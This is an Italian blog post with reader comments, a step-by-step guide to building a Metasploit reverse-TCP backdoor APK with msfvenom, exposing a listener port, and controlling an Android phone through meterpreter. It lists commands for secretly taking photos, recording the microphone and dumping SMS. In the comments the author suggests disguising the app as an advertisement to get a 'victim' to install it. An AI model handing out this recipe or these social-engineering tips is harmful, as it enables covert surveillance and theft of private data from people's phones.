Guida: Hackerare qualsiasi Smartphone Android

Avete sempre desiderato hackerare uno Smartphone Android o almeno sapere com’è possibile farlo? Seguite questa guida!

N.B. : funDROID non si assume alcuna responsabilità per come userete questa guida. Quello che spiegheremo di seguito è a solo scopo informativo.


La guida di seguito consiste nel creare un’applicazione che, una volta installata nello Smartphone da hackerare, vi permetterà di eseguire molteplici operazioni che vedremo di seguito.

Per creare una connessione tra lo Smartphone Android hackerato ed il PC sfrutteremo l’exploit android/meterpreter/reverse_tcp. 

REQUISITI

  • KALI Linux 2.0 installato sul vostro PC (Se non l’avete installato potrete procedere con il download attraverso questo link e scaricare la versione adatta al vostro PC, 32bit o 64bit);
  • Smartphone Android (I permessi di ROOT non sono obbligatori);

PREPARAZIONE DEI DATI NECESSARI

Per prima cosa avviate Kali Linux.

Ora dovrete conoscere il vostro IP Globale, per farlo vi basterà visitare il sito myglobalip.
Segnatevi l’indirizzo che apparirà, perchè vi servirà più avanti.

Il secondo step consiste nel conoscere l’IP Locale del PC su cui state eseguendo Kali Linux. Per farlo aprite il terminale e digitate:

ifconfig

Dovrebbe uscirvi un risultato simile a questo:

raspberry-pi-ifconfig

Quello che vi serve è l’indirizzo che inizia con 192.168.X.XXX, segnatevelo.

Giunti a questo punto dovrete aprire la porta 4444 del vostro router su entrambi i protocolli (TCP e UDP) e settare come IP Locale l’IP che avete segnato sopra (quello che inizia con 192.168.X.XXX).
Se non sapete come aprire le porte visitate questa pagina e cercate il modello del vostro router per ottenere una guida dettagliata su come fare.

Giunti a questo punto dovreste conoscere il vostro IP Globale e l’IP Locale del PC con cui state cercando di hackerare lo Smartphone Android ed avere la porta 4444 del vostro router sbloccata.

CREAZIONE DELL’APPLICAZIONE

Per creare l’applicazione dovrete prima di tutto aprire il terminale di Kali e digitare il seguente comando:

msfvenom -p android/meterpreter/reverse_tcp LHOST=IPGLOBALE LPORT=4444 R > /root/FILENAME.apk

Al posto di IPGLOBALE scrivete il vostro IP Globale ed al posto di FILENAME scrivete il nome che volete dare alla vostra applicazione.

Dovreste ricevere un risultato simile a questo:

635718957795092420.w654

Ora se andate nella cartella root di Kali dovreste vedere il file apk che avete appena creato.

Ora copiate l’applicazione nello Smartphone Android ed installatela.

Quando avrete installato l’applicazione su Android dovreste vedere nel drawer un’applicazione chiamata Main Activity con l’icona di Android.

PREPARARE LA CONSOLE DI HACKERAGGIO

Ad installazione ultimata tornate su Kali ed aprite di nuovo il terminale per digitare i seguenti comandi, uno dopo l’altro:

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST IPLOCALE
set LPORT 4444
exploit

Al posto di IPLOCALE dovrete scrivere l’IP Locale del PC su cui state usando Kali.

Dopo aver dato l’ultimo comando (exploit) dovrete avviare l’applicazione Main Activity appena installata sullo Smartphone Android.

Se avete settato tutto correttamente dovreste nel terminale di Kali qualcosa di questo tipo:

create-persistent-back-door-android-using-kali-linux.w654

Se vedete l’ultima riga di comando che inizia con meterpreter > significa che tutto funziona correttamente.

COSA POSSO FARE ORA?

La risposta è semplice: tutto.

Potrete utilizzare tutti i comandi come se foste in una shell di Linux, come:

  • ls
  • cd NomeCartella
  • cd ..
  • mkdir NomeCartella
  • etc …

Ecco una lista di comandi utili che potrete eseguire:

  • sysinfo: vi restituisce alcune informazioni sul sistema Android su cui è installata l’applicazione, come per esempio il sistema operativo ed il nome dell’utente;
  • ps: vedere i processi attivi sullo Smartphone;
  • check_root: controlla se il dispositivo ha i permessi di root;
  • webcam_list: vi restituisce una lista delle fotocamere disponibili (di solito Front Camera e Back Camera);
  • webcam_shot: effettua una foto con la fotocamera selezionata e la salva nella cartella root del vostro PC;
  • record_mic: effettua una registrazione con il microfono principale e la salva nella cartella root del vostro PC;
  • dump_sms: effettua una copia del database dei messaggi e la salva nella cartella root del vostro PC.

Per vedere una lista delle operazione che potete eseguire digitate il seguente comando:

help

Per qualsiasi domanda o malfunzionamento siamo a disposizione nel box dei commenti.

CONDIVIDI
Appassionato di Android, esperto in Internet Marketing. Cellulari posseduti: - HTC Desire Z - Samsung Galaxy Next - Samsung Galaxy S2 - Samsung Galaxy Nexus - LG Nexus 4 - Samsung Galaxy S4 - LG Nexus 5 - Samsung Galaxy Note 2 - LG G2 - OnePlus One - Sony Xperia Z3 Compact - Samsung Galaxy S6 Edge - Xiaomi Redmi 3 Pro
  • Lillo

    Ciao, scusa la mia ignoranza belluina…come mai “myglobalip” (che non conoscevo) mi da un certo indirizzo, “whatismyip” me ne da un altro, e se navigo con “ultrasurf” (o con un’altra VPN), l’indirizzo che mi da “whatismyip” cambia mentre quello di “myglobalip” rimane lo stesso ? La VPN non dovrebbe nascondere il mio indirizzo ? La situazione è un po’ ingarbugliata e la mia esposizione, forse, non è il massimo…cmq, se non si è capito, ho il pallino per l’anonimato e questa cosa che “myglobalip” non cambia, proprio non mi va giù 🙂 !

    • Ciao, ho appena provato sia “whatismyip” che “myglobalip” e l’indirizzo che ne è uscito è lo stesso. Comunque (ipotesi) myglobalip potrebbe analizzare l’ip in modo diverso rispetto a whatismyip. Nel senso che magari la prima volta che esegue la scansione si salva il tuo MAC address e lo abbina all’ip con cui ti sei collegato, tenendolo in “memoria” per un po’ di tempo. Hai provato ad eseguirli entrambi dallo stesso browser?

  • Andrea Mantovani

    ma se l’applicazione fosse installata su più dispositivi come faccio a scegliere ? Cosa succederebbe ? io ho provato sul mio cellulare e funziona, ma dal momento che lo installo anche su altri telefoni ?

    • Non credo si possa attuare su più telefoni contemporaneamente, dovresti in quel caso modificare l’apk e farlo più complesso, per cercare di distinguerli magari.

  • Giovanni

    se io volessi farlo su un telefono? e mandare l’applicazione magari camuffata? cioè se io non ho accesso al telefono che vorrei craccare come faccio?

    • Senza installare l’apk su un’altro telefono questa guida non è applicabile, dovresti tramite qualche “trucco” poco legale, riuscire a farla installare nel telefono che vuoi seguire. Magari spacciandola per qualche pubblicità interessante per la “vittima”, ma stiamo parlando di azioni che vanno oltre quello che è la legalità! 🙂

  • [email protected]

    Quando arrivo alla fine di tutto non si colllegano pc e telefono, forse è un problema della porta 4444 non aperta???

  • Sacchi Franco

    Una domanda.. ma il mio IPGLOBALE, che dato per scontato è dinamico… posso raggiungerlo ugualmente utilizzando servizzi di ddns? tipo il NOIP?

  • Daniele

    Ho provato il procedimento ma funge solo da locale ossia inserendo in entrambi i casi(creazione della backdoor e settaggio di essa) l’indirizzo ip della macchina e la stessa connessione a internet…funziona benissimo e nulla da dire al riguardo. In ogni caso ho voluto provare eseguendo i comandi per crearla in remoto inserendo l ip pubblico come punto di ascolto e disattivando il wifi sullo smartphone,ma facendolo accedere alla rete mobile e non sono riuscito a farlo connettere con metasploit (resta in ascolto senza collegare i due dispositivi). Ce un modo per creare la backdoor solo ed esclusivamente da remoto, quindi senza essere connessi alla stessa rete?

  • Giuseppe Favara

    la porta deve essere per forza aperta su entrambi i protocolli di rete? oppure basta solo il protocollo tcp?